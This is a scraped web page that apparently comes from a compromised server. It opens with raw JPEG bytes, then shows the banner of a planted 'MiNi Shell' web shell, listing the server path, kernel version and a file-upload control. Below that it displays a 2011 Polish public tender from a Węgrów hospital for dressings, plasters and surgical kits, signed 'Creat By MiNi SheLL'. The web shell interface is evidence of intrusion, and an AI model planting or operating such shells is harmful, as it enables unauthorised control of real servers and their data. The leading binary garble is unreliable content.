JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111219/430990-N-2011.html

<p class="kh_header"><b>Węgrów: Dostawa materiałów opatrunkowych, plastrów, wyrobów higienicznych oraz zestawów, fartuchów i akcesorii do zabiegów operacyjnych</b><br>
<b>Numer ogłoszenia: 430990 - 2011; data zamieszczenia: 19.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kościuszki 15, 07-100 Węgrów, woj. mazowieckie, tel. 025 7922833, faks 025 7922833.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.wegrow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów opatrunkowych, plastrów, wyrobów higienicznych oraz zestawów, fartuchów i akcesorii do zabiegów operacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet I-Opatrunki , Pakiet II- Opatrunki , Pakiet III- Opatrunki, Pakiet IV- Opatrunki specjalistyczne, Pakiet V- Opatrunki specjalistyczne, Pakiet VI- Plastry, Pakiet VII- Plastry,
Pakiet VIII- Wyroby higieniczne, Pakiet IX- Zestawy, fartuchy i akcesoria do zabiegów operacyjnych sterylne, Pakiet X- Obłożenie do porodu, opatrunek do mocowania kaniul u dzieci i dorosłych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.11.10-4, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7, 33.77.00.00-8, 33.14.16.20-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W celu potwierdzenia, że oferowane dostawy opowiadają określonym wymaganiom  Zamawiający żąda: 
         1) oświadczenia o posiadaniu dokumentów potwierdzających podstawę dopuszczenia  
             przedmiotu zamówienia do obrotu i stosowania na terenie RP, zgodnie z ustawą 
             z  dnia  20 maja 2010r.o wyrobach medycznych (Dz. U. z 2010r. nr 107, poz.679) 
             i przepisami wykonawczymi i dokumenty będą udostępnione na każde żądanie        
             Zamawiającego, zgodne z wzorem stanowiącym  Załącznik Nr 5 Specyfikacji.      
        2) karty danych technicznych zaoferowanych wyrobów dla pakietu IX 
             oraz dla pakietu X- poz. 1.
        3) oświadczenia Wykonawcy, że zaoferowane wyroby spełniają wymogi    
            norm PN-EN 13795- 1,2,3, dotyczy pakietu  IX i pakietu X- poz. 1 i dokumenty                 
            będą udostępnione na każde żądanie Zamawiającego .
        4) próbki po 1 sztuce/ komplecie-  dotyczy : pakietu IX poz.1-8,11,13-18
            i pakietu X - poz.1.
2.Sporządzony przez Wykonawcę, według wzoru stanowiącego Załącznik Nr 1 do  Specyfikacji, Formularz ofertowy.
3.Sporządzony przez Wykonawcę , według wzoru stanowiącego Załącznik Nr 2 do Specyfikacji, Formularz cenowy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Postanowienia umowy zawarto w projekcie umowy stanowiący Załącznik Nr 6 
   niniejszej Specyfikacji. 
2.Zamawiający przewiduje ramach zawartej umowy zmiany dotyczące: zmiany stawek 
   podatkowych, wynikające ze zmiany podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz.wegrow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej 
ul. Kościuszki 15
07-100 Węgrów
Dział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.12.2011 godzina 10:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej 
ul. Kościuszki 15
07-100 Węgrów
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet I- Opatrunki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Lignina bielona arkusze- 3 000kg
2.Lignina rolki a 150 g-500szt
3.Wata opatrunkowa bawełniano-wiskozowa a 200 g - 500 op.
4.Wata opatrunkowa bawełniano-wiskozowa a 500 g -300op.
5.Gaza mb 85cm -90 cm-8000mb
6.Gaza wyjałowiona 1 m. x 1m z gazy 17 nitkowej-16000szt.
7.Gaza wyjałowiona 1/2 m 2 z gazy 17 nitkowej-5000szt.
8.Chusta operacyjna 20N 4W 45x45cm(+/- 10%) z nitką radiacyjną lub z wszytym w brzeg serwety elementem   
   kontrastującym w postaci chipa pcv - 9000 szt. 
9. Chusta operacyjna jałowa 17N 4W 45x45cm (+/-10%) z nitką radiacyjną - 100szt.
10. Kompresy gazowe 17 N 8W  nie wyjałowione 7,5x7,5cm a 100szt-6500op.
11. Kompresy gazowe 17N  8 W nie wyjałowione 10x10cm a 100 szt.- 2000op.
12. Kompresy gazowe wyjałowione 17N 8W 7,5x7,5 a 3 szt.- 30 000op.
13. Kompresy gazowe  wyjałowione 17N 8 W 5 x 5 a 3 szt.- 18 000op.
14. Opaska elastyczna tkana z zapinką  5 x 15 cm pakowana pojedynczo- 1500op.
15. Opaska elastyczna tkana z zapinką   5 x 12 cm pakowana pojedynczo - 650op.
16. Opaska elastyczna tkana z zapinką  5 x 10 cm pakowana pojedynczo - 500op.
17. Opaska dziana podtrzymująca   4 x 5 cm pakowana pojedynczo - 8000szt.
18. Opaska dziana podtrzymująca  4 x 10 cm pakowana pojedynczo - 12000szt.
19. Opaska dziana podtrzymująca  4 x 15 cm pakowana pojedynczo -8000szt.
20. Opaska gipsowa a 3m x 14-15 cm -3500szt.
21. Opaska gipsowa a 3m x 12 cm -1000szt.
22. Opaska gipsowa a 3m x 10 cm -750szt.
23. Przylepiec chirurgiczny z włókniny z warstwą przylepną a 10m x 15 cm -90op.
24. Przylepiec chirurgiczny z włókniny z warstwą przylepną a 10m x 10 cm- 100op. 
25. Przylepiec chirurgiczny z włókniny z warstwą przylepną a 10 m x 20 cm -10 op. 
26. Przylepiec chirurgiczny z włókniny z warstwą przylepną a 10 m  x 5 cm  -50 op.
27.Siatkowy  opatrunek elastyczny na: palec dłoń ,stopę ramię, łokieć, podudzie, kolano, głowę, udo ,biodra,  
     klatkę piersiową, brzuch, na bardzo duży tułów ( stan nierozciągnięty) bawełniano- syntetyczny-  5 775 mb.
28. Materiał wyściełający 15cm x 3m- 200szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.11.10-4, 33.14.11.12-8, 33.14.11.13-4, 33.14.11.14-2, 33.14.11.15-9, 33.14.11.19-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> pakiet II- Opatrunki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opatrunek jałowy do tamponady z 24 nitkowej gazy impregnowanej żelem węglowodorowym 2cm x 5 cm-20 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet III- Opatrunki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Wkład ginekologiczny 34 cm x 9cm  a 10 szt. -15 000 szt.
    2.Podkład sterylny z nieprzemakalnej włókniny foliowanej 75 cm x 75 cm - 1500 szt.
    3.Seton z gazy 17 nitkowej 8 warstwowy, jałowy 2m x 7,5cm - 200 szt.
    4.Seton z gazy 17 nitkowej 4 warstwowy, jałowy 2m x 5cm- 400 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet IV- Opatrunki Specjalistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wielowarstwowy opatrunek  na rany pokryty srebrem nanokrystalicznym, sterylny 10x 10cm x5 szt. - 60 op.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet V- Opatrunki Specjalistyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Opatrunek hydrokoloidowy jałowy, samoprzylepny 10cm x 10cm a 10szt-150 op.
2.Opatrunek hydrożelowy jałowy, samoprzylepny, przezroczysty 12,5cm x 12,5cm a 5szt-120op.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet VI- Plastry.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przylepiec na włókninie pokrytej hipoalergicznym klejem akrylowym lub z syntetycznego kauczuku 5m x 1,25cm- 20szt.
2.Przylepiec na włókninie pokrytej hipoalergicznym klejem akrylowym lub z syntetycznego kauczuku 5m x 2,5cm- 2000szt.
3.Przylepiec na włókninie pokrytej hipoalergicznym klejem akrylowym lub z syntetycznego kauczuku 5m x 5cm-200szt.
4.Przylepiec na tkaninie pokrytej hipoalergicznym klejem akrylowym lub z syntetycznego kauczuku 5m x 2,5cm -1500szt.
5.Przylepiec na tkaninie pokrytej hipoalergicznym klejem akrylowym lub z syntetycznego kauczuku 5m x 5cm -200szt.
6.Plaster z opatrunkiem pokryty hipoalergicznym klejem akrylowym lub z syntetycznego kauczuku 1m x 6cm- 500 szt.
7.Samoprzylepny, jałowy opatrunek na rany o zaokrąglonych brzegach; papier ochraniający warstwę klejącą nacięty wzdłuż krótszej krawędzi, rozm. 7,5x5cm - 1000 szt.
8. Samoprzylepny, jałowy opatrunek na rany o zaokrąglonych brzegach; papier ochraniający warstwę klejącą nacięty wzdłuż krótszej krawędzi, rozm. 10x6cm   -120 szt.
9. Samoprzylepny, jałowy opatrunek na rany o zaokrąglonych brzegach; papier ochraniający warstwę klejącą nacięty wzdłuż krótszej krawędzi, rozm. 15x6cm   -300 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.11.12-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet VII-Plastry.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Opatrunek hipoalergiczny do mocowania kaniul, rozmiar 6x7cm - 400 szt.
2. Opatrunek hipoalergiczny, rozmiar 10x12cm - 50 szt.
3. Plaster hipoalergiczny rozmiar 2,5x9,14m - 150 szt.
4.Opatrunek hipoalergiczny do mocowania kaniul rozmiar 7,6x 5,1cm- 10 000 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.11.12-8, 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet VIII-Wyroby higieniczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Pieluszki jednorazowe dla noworodków o wadze 2-5 kg- 3 000 szt.
   2. Pieluchomajtki dla dorosłych rozm. Large, 3 - 3 600 szt.
   3. Podklad higieniczny z wkładem chłonnym z pulpy celulozowej 90 x 60 cm - 720 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.77.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet IX-Zestawy, fartuchy i akcesoria do zabiegów operacyjnych sterylne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Sterylny uniwersalny zestaw czteroserwetowy- 300 kpl.
   2. Zestaw do artroskopii stawu kolanowego  sterylny- 30 kpl.
   3. Sterylna osłona z folii przezroczystej na przewody używane przy zabiegach wideochirurgicznych- 100 szt
   4. Sterylny zestaw do cesarskiego cięcia w pozycji na plecach- 30kpl.
  5. Zestaw zabiegów na kończynie sterylny- 30 kpl.   
  6. Sterylna serweta z otworem o śr. 7 cm- 100szt.
  7. Sterylna taśma samoprzylepna włókninowa 10x50 cm.-200 szt.
  8.Komplet chirurgiczny jednorazowego użytku rozmiar XL;  kolor: zielony, rozmiar L;  kolor: różowy, rozmiar M;        
     kolor: różowy- 160 kpl.
  9. Jednorazowy jałowy fartuch chirurgiczny rozmiar XL, L- 400 szt.
 10. Pakiet chirurgiczny sterylny- 50 kpl.    
 11. Sterylny zestaw do zmiany opatrunków I -100 kpl.
 12. Sterylny zestaw do zmiany opatrunków II - 100 kpl.                                                                                                                                                                                                                                                                                                                               
 13. Sterylny zestaw do zakładania szwów  -100kpl.
 14. Sterylny zestaw do zdejmowania szwów -100 kpl.  
 15. Sterylny zestaw do cewnikowania pęcherza moczowego- 100 kpl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.16.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet X-Obłożenie do porodu, opatrunek do mocowania kaniul u dzieci i dorosłych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Sterylna serweta pod pośladki z torbą na płyny- 150 szt.
  2.Sterylny przezroczysty półprzepuszczalny opatrunek do mocowania kaniul obwodowych u dzieci-150 szt.
  3. Sterylny przezroczysty półprzepuszczalny opatrunek do mocowania kaniul obwodowych o wysokiej     
     przylepności i przepuszczalności dla pary wodnej- 100 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.16.20-2, 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com